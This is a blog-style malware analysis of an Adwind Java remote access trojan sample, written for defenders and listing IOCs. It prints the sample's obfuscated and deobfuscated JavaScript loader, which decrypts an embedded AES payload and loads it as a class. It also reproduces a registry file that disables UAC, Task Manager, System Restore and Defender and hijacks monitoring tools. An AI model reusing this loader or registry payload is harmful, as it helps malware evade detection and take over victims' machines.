Malware Analysis – Adwind JRat

Malware Analysis – Adwind JRat

Adwind is a JAVA Based Remote Access Trojan.

In this post we will be analyzing an Adwind JRat sample

File Name: BAC.jar

MD5: fd992b7219c34c8c2ff59174b682e3a7

SHA256: 054d36da71223e23740560755c7a5bc2717d2896b98b43805816f3c7b114f15d

File Size: 531,254 B

Static Analysis

Using PEStudio, we discovered the following:

Vendors on Virus Total have identified the sample as Adwind

The analysed sample is a JAR file which can be run only by Java. JAR files are used to combine resources and the executable Java .class files into one package. The .class files are created when the Java compiler converts the Java source code into the respective Java byte code. The .class files contain Java byte code (machine code) which can be run by the JVM.

To understand the code, the Jar file will need to be decompiled into the source code

Opening the Jar file in JDGui, it was seen that there are multiple class files with weirdly named functions.

Resources section also had weirdly named files. On checking the content, it was seen that it was unreadable content

Following the links between the class files it was seen that the class Catananche has a function fans with a URL return type. This function receives a path from the Boxing class

Catanche Class
Boxing class

The /com/dk1/prn/Haggada.hit file has some obfuscated code which looks like Javascript.

This is further confirmed by the presence of a return type of Javascript in the Touched class file

Following is the heavily obfuscated Javascript code

((‘OOOOO’+’O’+’OO’+’O’+’O’+’O’+’OOOOOO’+’kkO’+’kkkOk’+’OOkk’+’k’+’kO =’+’ j’+’av’+’a’+’.l’+’ang’+’.By’+’te[(\’’+’T\’+\’’+’Y’+’\’+\’’+’P\’+’+’\’’+’E\’’+’)’+’]; ‘+’O’+’OOOOOOO’+’OOOO’+’OOOO’+’OOi’+’i’+’i’+’O’+’iO’+’iOO’+’OiiiO’+’=(\’’+’qua\’+’+’\’.’+’e\’’+’+’+’\’nt’+’e\’’+’+\’rp’+’\’+’+’\’r\’+’+’\’ise\’’+’+\’.\’+’+’\’’+’r\’’+’+\’ea’+’\’’+’+\’q\’+’+’\’’+’t’+’o’+’\’’+’+\’r\’’+’+\’.’+’r\’+\’ea’+’qt\’+’+’\’i\’+\’o’+’\’+\’n’+’s\’+’+’\’.s’+’\’+’+’\’’+’ta’+’n\’+\’d’+’ar\’+\’tb’+’o\’+\’’+’o\’’+’+’+’\’’+’ts\’+\’’+’tr\’’+’+\’’+’a\’+\’’+’p.’+’H\’+\’’+’ea\’+’+’\’der\’’+’); MM’+’MMMM’+’MMMMM’+’M’+’M’+’MMMMM’+’Mk’+’Mk’+’MM’+’Mkk’+’MMk’+’k’+’M=jav’+’a.la’+’ng.Cl’+’a’+’ss[(‘+’\’fo’+’r’+’\’+\’’+’N’+’a’+’me\’’+’)]’+’(‘+’(\’com’+’.d\’+\’’+’k’+’l\’+\’’+’.pr\’+’+’\’n’+’.Fr’+’\’’+’+’+’\’’+’uc’+’\’’+’+’+’\’t’+’ose\’’+’)’+’); ‘+’JJ’+’JJ’+’JoJJ’+’JJ’+’ooo’+’=’+’MMMMM’+’MMMMM’+’M’+’M’+’MMMMM’+’MMkMk’+’MM’+’M’+’k’+’kMM’+’kkM[(\’’+’g’+’\’+’+’\’e\’’+’+\’t’+’\’’+’+\’C\’+\’’+’l’+’\’+’+’\’a\’’+’+\’s\’+\’’+’s\’+\’’+’L\’+\’o’+’\’+\’’+’a\’+\’d’+’\’’+’+’+’\’e\’+\’’+’r\’)]’+’(‘+’);’+’ ‘+’OOOOO’+’OOOOO’+’O’+’OOO’+’OO’+’Ommmm’+’mOmmm’+’mmOm’+’Om’+’=fun’+’ct’+’ion(M’+’MMMMM’+’MMM’+’MMMMMM’+’M’+’MM’+’kMMkMM’+’kkkkMM’+’kk)’+’{ Ko’+’KooKK’+’KKK’+’KKK’+’K=’+’M’+’MM’+’MMM’+’M’+’MMMMM’+’MMM’+’MMMk’+’MMk’+’MMk’+’kk’+’kMM’+’kk[0]’+’;’+’ OO’+’OOOO’+’OO’+’OO’+’OOOO’+’O’+’O’+’OiiOi’+’Oii’+’O’+’ii’+’iOi’+’Oi=M’+’MM’+’MM’+’MMMM’+’MMMM’+’MMM’+’M’+’MkMMkM’+’Mkkk’+’kMMkk[1'+’]; JJ’+’JJ’+’JJJ’+’JJJ’+’JJJJ’+’JJJJ’+’JjJJ’+’jjj’+’jJjjj’+’J’+’j=K’+’oK’+’ooK’+’KK’+’KK’+’KKKK+’+’(\’.\’’+’)’+’+O’+’OOOO’+’OOOOO’+’OOO’+’O’+’OOOi’+’iOi’+’O’+’iiOii’+’iOi’+’Oi; Mi’+’iiMii’+’MiM’+’iii’+’i’+’M=MMM’+’M’+’M’+’M’+’MM’+’M’+’MM’+’MMMMM’+’MM’+’k’+’MMk’+’MM’+’kkk’+’kM’+’Mkk[‘+’2]; JJ’+’JJJJ’+’J’+’JJ’+’JJJJ’+’JJJJi’+’JiJiJ’+’JJ’+’J’+’iiJiJ’+’J=Mi’+’i’+’iM’+’i’+’i’+’MiMi’+’iiiM[‘+’1]’+’;’+’ ‘+’OlO’+’OlllO’+’O’+’OOl’+’O’+’=Mii’+’iMiiM’+’iMiii’+’i’+’M’+’[2]; ‘+’JooJo’+’oJoo’+’Jo’+’oo’+’J=’+’O’+’l’+’O’+’Ol’+’llOOO’+’OlO’+’[1'+’]’+’; ‘+’I’+’IIIIII’+’IIII’+’I’+’II’+’I’+’IImmIm’+’mIImIm’+’Immm’+’m’+’=’+’Mi’+’i’+’i’+’Mii’+’MiMi’+’i’+’iiM[3'+’]; ‘+’L’+’LLLLLL’+’LLLLL’+’LL’+’LLLLL’+’k’+’kLLkk’+’L’+’kL’+’LLkk’+’=’+’java.’+’l’+’a’+’ng’+’.ref’+’lect.’+’Ar’+’ray[(\’’+’n’+’e\’+\’’+’w’+’In’+’stan\’’+’+\’’+’ce’+’\’)](O’+’O’+’OO’+’OO’+’O’+’OOOOO’+’OOOO’+’Okk’+’Okk’+’kOkOO’+’kkkkO’+’,Joo’+’Joo’+’J’+’oo’+’Jooo’+’J); J’+’Joo’+’ooo’+’o’+’J’+’J’+’ooooo=’+’MMMM’+’MMM’+’MMMM’+’MMM’+’M’+’M’+’MM’+’MkMk’+’MMMkk’+’M’+’MkkM’+’; O’+’OOO’+’OOO’+’O’+’OOOOO’+’OOO’+’O’+’jj’+’OO’+’jjj’+’OjO’+’jj’+’Ojj=’+’(\’/\’)’+’+JJJJJ’+’JJJ’+’J’+’JJ’+’JJJJ’+’JJiJi’+’J’+’iJJJ’+’JiiJi’+’JJ’+’[0];’+’ KK’+’KKKKKKK’+’KKKKK’+’K’+’KKKKK’+’KK’+’KKK’+’oKooK’+’Ko’+’=JJo’+’o’+’ooooJJ’+’oo’+’ooo[(‘+’\’ge’+’\’+\’’+’t’+’Re’+’so’+’\’+\’urc’+’e\’’+’)](‘+’O’+’OO’+’OO’+’OO’+’OOOOO’+’OO’+’OO’+’Ojj’+’OOjj’+’jOj’+’O’+’jjOj’+’j); M’+’Mjjjjjj’+’M’+’MjM’+’MMM=’+’K’+’KKKKK’+’KKKK’+’KKK’+’KKKKK’+’KK’+’KKK’+’KK’+’oKo’+’oKKo’+’[(\’op’+’en\’+\’’+’S’+’tr\’+’+’\’e\’+\’’+’a’+’\’’+’+’+’\’m\’)](‘+’); O’+’OOl’+’O’+’lOlO’+’l’+’OOO’+’O’+’O=new’+’ ‘+’java.’+’io.D’+’ata’+’Inpu’+’t’+’S’+’tream’+’(MM’+’j’+’jjjjjM’+’MjMMM’+’M); ‘+’OO’+’OlO’+’lOlO’+’l’+’OOOOO’+’[(\’r’+’ea’+’\’+\’dF’+’u\’+\’l’+’l’+’y’+’\’)](LL’+’LL’+’L’+’L’+’L’+’LL’+’LLLL’+’L’+’LLLLL’+’kkLL’+’kkLkL’+’L’+’Lkk);’+’ LL’+’LL’+’LLLL’+’LLLLLL’+’LL’+’LLmmm’+’mmL’+’LLm’+’m’+’mL’+’mL’+’=j’+’a’+’vax’+’.cryp’+’to’+’.’+’Cipher’+’[(\’g’+’\’+\’e\’’+’+\’t\’+’+’\’I\’’+’+\’n’+’\’+\’s’+’\’+’+’\’’+’t\’+\’’+’a\’+\’’+’n\’+’+’\’c’+’\’+\’e\’’+’)]((‘+’\’AES’+’\’)’+’)’+’; ‘+’III’+’IIIII’+’IIII’+’II’+’I’+’II’+’II’+’llIl’+’IIl’+’IlI’+’Ill=’+’III’+’I’+’IIII’+’IIIII’+’I’+’III’+’mmIm’+’mIImI’+’mI’+’mm’+’mm[(‘+’\’ge\’+\’t’+’B’+’\’+\’y’+’te’+’\’’+’+\’s’+’\’’+’)]((‘+’\’U’+’TF’+’-8\’))’+’;’+’ I’+’lI’+’IIlII’+’llIl’+’lll=n’+’ew ja’+’v’+’ax’+’.cr’+’y’+’pt’+’o.sp’+’ec.S’+’ecre’+’t’+’KeyS’+’pe’+’c’+’(IIII’+’III’+’IIII’+’IIIII’+’IIIl’+’lIlI’+’Il’+’IlII’+’ll,’+’ ‘+’(\’AES’+’\’));’+’ LL’+’LLLL’+’LL’+’LL’+’LLLL’+’LLLL’+’m’+’mmm’+’m’+’LLLmm’+’mLm’+’L[(\’i’+’n’+’it\’)]’+’(jav’+’ax’+’.cry’+’pto.’+’Cip’+’he’+’r[(\’D\’+’+’\’E\’+\’’+’C\’+’+’\’’+’R’+’\’+\’Y’+’\’’+’+\’’+’P\’+\’’+’T\’’+’+\’_\’’+’+\’’+’M\’+’+’\’O’+’\’+\’D’+’\’+\’’+’E’+’\’)],’+’ IlII’+’IlIIl’+’l’+’Illll’+’); J’+’J’+’JJJkkJ’+’J’+’k’+’JJ’+’JJJ=L’+’L’+’LL’+’LL’+’LL’+’LL’+’LL’+’LLLL’+’LLm’+’mmmm’+’LLLm’+’mmLmL[‘+’(\’’+’doF’+’\’+’+’\’ina\’’+’+\’l\’’+’)](‘+’LL’+’LL’+’LLLLL’+’LL’+’L’+’LLL’+’LLLLk’+’kLL’+’kk’+’L’+’kLLLk’+’k)’+’;’+’ III’+’IIII’+’IIIII’+’III’+’II’+’ImmIm’+’I’+’Im’+’IImm’+’m’+’Im’+’=java’+’.’+’l’+’ang.Cl’+’a’+’ss’+’Load’+’e’+’r’+’[(\’cl’+’as\’+\’s\’)’+’];’+’ Kjjj’+’jKK’+’jKj’+’jK’+’j’+’K=jav’+’a.l’+’a’+’ng’+’.Stri’+’ng[(‘+’\’cl’+’a’+’s\’+\’s’+’\’)]; I’+’I’+’ll’+’Il’+’IlIII’+’l’+’lll’+’=JJJJ’+’J’+’k’+’kJJkJ’+’JJJ’+’J[(‘+’\’’+’g\’+’+’\’e\’’+’+’+’\’t\’’+’+\’C\’’+’+\’l\’+’+’\’’+’a\’+\’s\’’+’+\’s\’’+’)](‘+’); OO’+’OOOOOO’+’OOOOO’+’O’+’OOO’+’OkOkkO’+’OO’+’OOk’+’kO’+’Ok=’+’java’+’.la’+’ng.’+’Inte’+’g’+’er[(\’T’+’YPE\’)’+’];’+’ Kiii’+’KK’+’iK’+’iiiii’+’K=III’+’III’+’IIII’+’II’+’I’+’IIII’+’ImmIm’+’IIm’+’I’+’Imm’+’m’+’I’+’m[(\’’+’g\’+\’’+’e’+’\’+\’’+’t\’+\’’+’D’+’\’’+’+\’e\’’+’+’+’\’c\’+’+’\’l\’’+’+\’a\’’+’+\’r’+’\’+’+’\’e\’+’+’\’d’+’\’’+’+\’M\’+’+’\’’+’e\’’+’+\’t’+’\’’+’+’+’\’h’+’\’+’+’\’o\’+\’d’+’\’)]((‘+’\’d\’+\’’+’ef’+’i’+’\’+\’ne\’’+’+\’Cl’+’a\’+\’’+’s’+’s\’), ‘+’K’+’jjj’+’jKKj’+’KjjK’+’jK’+’, IIllI’+’lIlII’+’Illll,’+’ OO’+’O’+’OO’+’O’+’OO’+’O’+’OOO’+’OOO’+’OOOk’+’O’+’k’+’kOOOO’+’Okk’+’OOk’+’, OOOO’+’O’+’OO’+’OOO’+’O’+’OOOO’+’OOOkO’+’k’+’kOOO’+’OOk’+’kOOk);’+’ Kii’+’iKKiK’+’iii’+’iiK’+’[(\’’+’set’+’A\’+\’’+’c\’’+’+\’c\’+’+’\’ess’+’\’’+’+\’ib’+’l\’+\’e’+’\’)]’+’(true’+’); M’+’MMMMM’+’kMMkM’+’kk’+’M’+’k=’+’ ‘+’K’+’ii’+’iKK’+’i’+’Ki’+’iii’+’iK’+’[(\’in’+’v\’’+’+\’oke’+’\’)](J’+’J’+’JJ’+’JoJJ’+’J’+’Joo’+’o,’+’ JJJ’+’JJJJ’+’JJJJ’+’J’+’J’+’JJJJJ’+’J’+’jJJjj’+’jjJ’+’jjj’+’J’+’j’+’, ‘+’J’+’JJJJ’+’kkJJ’+’kJ’+’JJJJ’+’,’+’ 0, J’+’JJ’+’JJ’+’kkJJ’+’kJ’+’J’+’JJJ[(‘+’\’l\’’+’+\’e’+’n’+’\’+\’g’+’th’+’\’)]); ‘+’if(‘+’OOOO’+’OOOO’+’OOOO’+’OO’+’OOOO’+’iiiOiOi’+’OOO’+’ii’+’iO=’+’=JJJJ’+’JJJJ’+’JJJJJJ’+’J’+’JJJJ’+’jJJjj’+’jjJ’+’jjjJ’+’j)’+’ ‘+’OO’+’O’+’OOOOOO’+’O’+’OOO’+’O’+’OOO’+’i’+’iOOi’+’iOiOiO’+’iiO’+’O’+’=M’+’MMM’+’MMkM’+’MkM’+’kkM’+’k; };’+’ JJJJ’+’JJJJ’+’JJJ’+’J’+’JJJJJ’+’J’+’oJo’+’ooJ’+’JooJ’+’JJJo=’+’[[‘+’(\’q\’+\’’+’ua.e’+’\’+’+’\’n\’’+’+\’te\’’+’+\’rp’+’ri’+’\’’+’+\’’+’se.\’+’+’\’’+’rea’+’\’’+’+\’qt\’’+’+’+’\’or.’+’\’+’+’\’re\’+’+’\’a’+’\’+\’’+’q\’’+’+’+’\’tio\’’+’+’+’\’n\’+\’’+’s.\’+\’’+’sta’+’n’+’\’+’+’\’d\’+’+’\’a\’’+’+\’r’+’\’+\’tb’+’oo\’+’+’\’t’+’\’’+’+\’s’+’t\’’+’+’+’\’’+’r\’+’+’\’a’+’\’+’+’\’p’+’\’),(\’’+’H\’+\’e’+’\’+’+’\’a’+’\’+\’d\’’+’+\’e’+’\’’+’+\’r\’’+’),[[(‘+’\’.’+’\’+’+’\’e’+’n’+’c\’+’+’\’r\’+’+’\’y’+’pte\’’+’+\’d\’’+’),(\’.’+’\’+\’n\’’+’+\’o\’+’+’\’t’+’\’+’+’\’-’+’\’+’+’\’s\’’+’+\’’+’p\’+\’l’+’\’+’+’\’i’+’\’+\’t\’+’+’\’t\’+’+’\’e\’’+’+\’d’+’\’’+’)’+’,(\’.’+’\’+’+’\’n\’+’+’\’o’+’t-\’’+’+\’c’+’omp\’’+’+\’’+’re\’+’+’\’sse\’’+’+\’d’+’\’),’+’(\’.’+’\’+’+’\’’+’not-\’’+’+\’fi\’’+’+’+’\’x’+’e’+’\’+’+’\’d’+’\’)],’+’[(‘+’\’co\’’+’+’+’\’’+’m\’’+’+\’/’+’dk\’+\’’+’l/’+’\’+\’’+’pr’+’n/\’’+’+\’’+’Mo’+’\’+\’u’+’\’’+’+\’rn\’’+’+’+’\’in’+’\’+’+’\’’+’g.\’+\’p\’+’+’\’op’+’\’)],’+’[‘+’5'+’204,5'+’216'+’,5204,’+’5204]’+’,(‘+’\’f\’+\’’+’9\’+\’’+’X’+’\’+\’u’+’\’+\’X’+’\’’+’+\’L’+’\’’+’+\’P\’+\’’+’c\’+\’w’+’\’+\’Z\’+’+’\’E\’’+’+\’’+’z\’+\’h’+’\’+\’B’+’\’+\’’+’t\’’+’+\’’+’n\’’+’)]]];’+’ ‘+’for(L’+’LiiL’+’L’+’iLL’+’LL’+’LLi=0'+’;L’+’L’+’ii’+’LLiLL’+’L’+’LL’+’Li’+’<J’+’JJJ’+’JJJJJ’+’JJJ’+’JJJJJ’+’J’+’oJo’+’ooJJo’+’oJJJJ’+’o[(\’l’+’en’+’g\’+’+’\’’+’t’+’h\’)’+’]’+’;LLii’+’LL’+’iL’+’L’+’L’+’L’+’LL’+’i’+’++)’+’{ ‘+’OOOO’+’OOOOO’+’OOOOOO’+’OOmm’+’mmmO’+’mm’+’mmmOm’+’Om(JJ’+’JJJJJ’+’JJJJJ’+’JJJJ’+’J’+’JoJo’+’oo’+’JJo’+’oJJJJ’+’o[L’+’Li’+’iLL’+’iLL’+’LLLLi’+’]); }’+’ OOOOOO’+’OO’+’OO’+’OOO’+’OOO’+’Oii’+’O’+’OiiO’+’iOiOi’+’iOO[(‘+’\’n’+’\’+’+’\’ewI’+’\’’+’+\’n’+’s\’’+’+’+’\’tan\’’+’+’+’\’’+’ce’+’\’)]()’+’;’))

De-obfuscating the code using substitution, the deobfuscated code is

OOOOOOOOOOOOOOOOOkkOkkkOkOOkkkkO = java.lang.Byte[(‘TYPE’)];
OOOOOOOOOOOOOOOOOOiiiOiOiOOOiiiO=(‘qua.enterprise.reaqtor.reaqtions.standartbootstrap.Header’);
MMMMMMMMMMMMMMMMMMMkMkMMMkkMMkkM=java.lang.Class[(‘forName’)]((‘com.dkl.prn.Fructose’));
JJJJJoJJJJooo=MMMMMMMMMMMMMMMMMMMkMkMMMkkMMkkM[(‘getClassLoader’)]();
OOOOOOOOOOOOOOOOOmmmmmOmmmmmOmOm=function(MMMMMMMMMMMMMMMMMMkMMkMMkkkkMMkk)
{
KoKooKKKKKKKKK=MMMMMMMMMMMMMMMMMMkMMkMMkkkkMMkk[0];
OOOOOOOOOOOOOOOOOiiOiOiiOiiiOiOi=MMMMMMMMMMMMMMMMMMkMMkMMkkkkMMkk[1];
JJJJJJJJJJJJJJJJJJJjJJjjjjJjjjJj=KoKooKKKKKKKKK+(‘.’)+OOOOOOOOOOOOOOOOOiiOiOiiOiiiOiOi;
MiiiMiiMiMiiiiM=MMMMMMMMMMMMMMMMMMkMMkMMkkkkMMkk[2];
JJJJJJJJJJJJJJJJJiJiJiJJJJiiJiJJ=MiiiMiiMiMiiiiM[1];
OlOOlllOOOOlO=MiiiMiiMiMiiiiM[2];
JooJooJooJoooJ=OlOOlllOOOOlO[1];
IIIIIIIIIIIIIIIIImmImmIImImImmmm=MiiiMiiMiMiiiiM[3];
LLLLLLLLLLLLLLLLLLLkkLLkkLkLLLkk=java.lang.reflect.Array[(‘newInstance’)](OOOOOOOOOOOOOOOOOkkOkkkOkOOkkkkO,JooJooJooJoooJ);
JJooooooJJooooo=MMMMMMMMMMMMMMMMMMMkMkMMMkkMMkkM;
OOOOOOOOOOOOOOOOOjjOOjjjOjOjjOjj=(‘/’)+JJJJJJJJJJJJJJJJJiJiJiJJJJiiJiJJ[0];
KKKKKKKKKKKKKKKKKKKKKKKKKoKooKKo=JJooooooJJooooo[(‘getResource’)](OOOOOOOOOOOOOOOOOjjOOjjjOjOjjOjj);
MMjjjjjjMMjMMMM=KKKKKKKKKKKKKKKKKKKKKKKKKoKooKKo[(‘openStream’)]();
OOOlOlOlOlOOOOO=new java.io.DataInputStream(MMjjjjjjMMjMMMM);
OOOlOlOlOlOOOOO[(‘readFully’)](LLLLLLLLLLLLLLLLLLLkkLLkkLkLLLkk);
LLLLLLLLLLLLLLLLLLmmmmmLLLmmmLmL=javax.crypto.Cipher[(‘getInstace’)]((‘AES’));
IIIIIIIIIIIIIIIIIIIllIlIIlIlIIll=IIIIIIIIIIIIIIIIImmImmIImImImmmm[(‘getBytes’)]((‘UTF-8’));
IlIIIlIIllIllll=new javax.crypto.spec.SecretKeySpec(IIIIIIIIIIIIIIIIIIIllIlIIlIlIIll, (‘AES’));
LLLLLLLLLLLLLLLLLLmmmmmLLLmmmLmL[(‘init’)](javax.crypto.Cipher[(‘DECRYPT_MODE’)], IlIIIlIIllIllll);
JJJJJkkJJkJJJJJ=LLLLLLLLLLLLLLLLLLmmmmmLLLmmmLmL[(‘doFinal’)](LLLLLLLLLLLLLLLLLLLkkLLkkLkLLLkk);
IIIIIIIIIIIIIIIIIImmImIImIImmmIm=java.lang.ClassLoader[(‘class’)];
KjjjjKKjKjjKjK=java.lang.String[(‘class’)];
IIllIlIlIIIllll=JJJJJkkJJkJJJJJ[(‘getClass’)]();
OOOOOOOOOOOOOOOOOOkOkkOOOOOkkOOk=java.lang.Integer[(‘TYPE’)];
KiiiKKiKiiiiiK=IIIIIIIIIIIIIIIIIImmImIImIImmmIm[(‘getDeclaredMethod’)]((‘defineClass’), KjjjjKKjKjjKjK, IIllIlIlIIIllll, OOOOOOOOOOOOOOOOOOkOkkOOOOOkkOOk, OOOOOOOOOOOOOOOOOOkOkkOOOOOkkOOk);
KiiiKKiKiiiiiK[(‘setAccessible’)](true);
MMMMMMkMMkMkkMk= KiiiKKiKiiiiiK[(‘invoke’)](JJJJJoJJJJooo, JJJJJJJJJJJJJJJJJJJjJJjjjjJjjjJj, JJJJJkkJJkJJJJJ, 0, JJJJJkkJJkJJJJJ[(‘length’)]);
if(OOOOOOOOOOOOOOOOOOiiiOiOiOOOiiiO==JJJJJJJJJJJJJJJJJJJjJJjjjjJjjjJj)
OOOOOOOOOOOOOOOOOiiOOiiOiOiOiiOO=MMMMMMkMMkMkkMk;
};
JJJJJJJJJJJJJJJJJJoJoooJJooJJJJo=[[(‘qua.enterprise.reaqtor.reaqtions.stadartbootstrap’),(‘Header’),[[(‘.encrypted’),(‘.not-splitted’),(‘.ot-compressed’),(‘.not-fixed’)],[(‘com/dkl/prn/Mournig.pop’)],[5204,5216,5204,5204],(‘f9XuXLPcwZEzhBtn’)]]];
for(LLiiLLiLLLLLLi=0;LLiiLLiLLLLLLi<JJJJJJJJJJJJJJJJJJoJoooJJooJJJJo[(‘length’)];LLiiLLiLLLLLLi++)
{
OOOOOOOOOOOOOOOOOmmmmmOmmmmmOmOm(JJJJJJJJJJJJJJJJJJoJoooJJooJJJJo[LLiiLLiLLLLLLi]);
}
OOOOOOOOOOOOOOOOOiiOOiiOiOiOiiOO[(‘newInstance’)]();

A quick skimming through the code we observe:

  • javax.crypto.Cipher is used — There are references to AES, which indicate that there is AES Encryption/Decryption involved
  • It also accesses the file com/dkl/prn/Mournig.pop

Behavioral Analysis

On execution of the sample, the following is observed:

  • The Jar file drops multiple .class files into the AppData\Local\Temp folder
  • The Jar file drops multiple .vbs files into the AppData\Local\Temp folder. CSCRIPT is used to execute these files. On execution these files are deleted
  • XCOPY is used to copy the contents of Java JRE from C:\Program Files\Java\jre1.8.0_191 into C:\Users\Lizol\AppData\Roaming\Oracle\
Destination of XCopy Operation
  • A registry key TnIOJsNUCKX is added into CurrentVersion\Run. This Key points to an execution path
  • The folder TKqPJhHHoic is then assigned the hidden permission using attrib command
attrib +h “C:\Users\Lizol\TKqPJhHHoic\*.*”
  • The file \.jar.jChWSA is then executed

C:\Users\Lizol\AppData\Roaming\Oracle\bin\javaw.exe -jar

C:\Users\Lizol\TKqPJhHHoic\.jar.jChWSA

  • Regedit is then executed against a .reg file. It will import the contents of the reg file into the registry silently
regedit.exe /s C:\Users\Lizol\AppData\Local\Temp\lfTQsdJPKb4003450082576532965.reg
  • On analysing the code of lfTQsdJPKb4003450082576532965.reg we see the following code snippet:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
“SaveZoneInformation”=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
“LowRiskFileTypes”=”.avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;”
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
“SaveZoneInformation”=-
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations]
“LowRiskFileTypes”=-
[HKEY_CURRENT_USER\Environment]
“SEE_MASK_NOZONECHECKS”=”1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]
“SEE_MASK_NOZONECHECKS”=”1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe]
“debugger”=”svchost.exe”
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
“ConsentPromptBehaviorAdmin”=dword:00000000
“ConsentPromptBehaviorUser”=dword:00000000
“EnableLUA”=dword:00000000
“PromptOnSecureDesktop”=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe]
“debugger”=”svchost.exe”
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000002
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore]
“DisableConfig”=dword:00000001
“DisableSR”=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe]
“debugger”=”svchost.exe”
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]
“debugger”=”svchost.exe”
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe]
“debugger”=”svchost.exe”
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe]
“debugger”=”svchost.exe”
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe]
“debugger”=”svchost.exe”
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe]
“debugger”=”svchost.exe”
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe]
“debugger”=”svchost.exe”
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe]
“debugger”=”svchost.exe”
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]
“debugger”=”svchost.exe”
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe]
“debugger”=”svchost.exe”
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe]
  • It is seen that it tries to detect monitoring applications and tries to map/launch them with svchost.exe set as the debugger.
  • It has disabled TaskManager and System Restore as well.
  • It then runs a taskkill against all mentioned process names mapped in that .reg file
  • Here taskkill will terminate the processes and its respective child processes forcefully.
  • Netmon shows no activity, for any of the above processes. There were DNS requests that were sent out to following domains:

secondbkup[.]myeffect[.]net which had no A record mapping which indicates that the domain was taken down, hence execution did not proceed further with any CNC connections

IOCs

File IOCs

File Name: BAC.jar
MD5: fd992b7219c34c8c2ff59174b682e3a7
SHA256: 054d36da71223e23740560755c7a5bc2717d2896b98b43805816f3c7b114f15d
File Size: 531,254 B

File Name: _0.58455697052535998057311208249241793.class
MD5: 781fb531354d6f291f1ccab48da6d39f
SHA256: 97d585b6aff62fb4e43e7e6a5f816dcd7a14be11a88b109a9ba9e8cd4c456eb9
File Size: 247,088 B

File Name: .jar.jChWSA
MD5: fd992b7219c34c8c2ff59174b682e3a7
SHA256: 054d36da71223e23740560755c7a5bc2717d2896b98b43805816f3c7b114f15d
File Size: 531,254 B

File Name: lfTQsdJPKb4003450082576532965.reg
MD5: 7f97f5f336944d427c03cc730c636b8f
SHA256: 9613caed306e9a267c62c56506985ef99ea2bee6e11afc185b8133dda37cbc57
File Size: 27,926 B

Network IOCs

Malicious Domain: secondbkup[.]myeffect[.]net
Malicious IP: NA

Summary of Findings

  • Sample is of the Adwind Malware
  • Adwind is a Java RAT that is distributed as a JAR file
  • Common behaviour is it will use xcopy to copy JRE files to a different location, drop and execute .class and .vbs files
  • In this sample, there was Monitoring program detection and modification baked in.
  • Here the domain was taken down, hence CnC connections were not possible

This post is also available on my medium https://medium.com/@sandmaxprime/malware-analysis-adwind-jrat-8f58c66ff7bb

Leave a Reply